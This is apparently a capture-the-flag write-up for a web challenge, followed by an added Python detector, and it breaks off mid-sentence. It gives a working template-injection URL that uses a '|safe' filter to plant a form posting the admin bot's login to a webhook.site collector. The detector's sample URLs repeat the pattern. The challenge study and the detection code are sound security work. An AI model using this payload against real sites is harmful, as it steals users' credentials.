Tags: web
The final URL to send to the admin bot was:
```
https://brokenlogin.web.actf.co/?a=%3Cform%20action=%22https://webhook.site/1cd86cf8-333c-4a1d-b26d-f7e47c934641%22%20a=%22%3E&message={{request.args.a|safe}}
```
This bypasses the `escape` filtering by using the template injection to reference another query parameter.
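A defender-side check for the pattern described above, as an added example that is not part of the original writeup or the challenge's source. It flags query parameters whose Jinja2-style expressions pass through HTML escaping unchanged and pull markup from a sibling parameter. The `audit_url` helper, the sample URLs and their host names are constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Jinja2-style expression and statement delimiters.
TEMPLATE_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# request.args.name or request.args['name'] inside an expression.
ARG_REF = re.compile(r"request\.args(?:\.(\w+)|\[\s*['\"](\w+)['\"]\s*\])")
# The |safe filter marks a value as trusted, so autoescaping skips it.
SAFE_FILTER = re.compile(r"\|\s*safe\b")


def audit_url(url):
    """Return one finding per query parameter value that carries template syntax."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    findings = []
    for name, values in params.items():
        for value in values:
            exprs = TEMPLATE_EXPR.findall(value)
            if not exprs:
                continue
            escaped = html.escape(value)  # what an HTML-escape filter would emit
            refs = sorted({a or b for e in exprs for a, b in ARG_REF.findall(e)})
            findings.append({
                "param": name,
                "expressions": exprs,
                # True when escaping leaves the template expression intact.
                "survives_html_escape": all(e in escaped for e in exprs),
                "uses_safe_filter": any(SAFE_FILTER.search(e) for e in exprs),
                "referenced_params": refs,
                # Sibling parameters that supply raw markup to the expression.
                "markup_in_referenced": [
                    r for r in refs if any("<" in v for v in params.get(r, []))
                ],
            })
    return findings


# Constructed sample requests (hosts are placeholders).
SAMPLE_URLS = [
    "https://app.example/?message=hello%20world",
    "https://app.example/?message=%3Cb%3Ehi%3C/b%3E",
    "https://app.example/?a=%3Cform%20action=%22https://collector.example/x%22%3E"
    "&message={{request.args.a|safe}}",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(u, "->", audit_url(u))
```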
The admin bot would then fill out the form with a username and password and submit the form. By providing a payload of `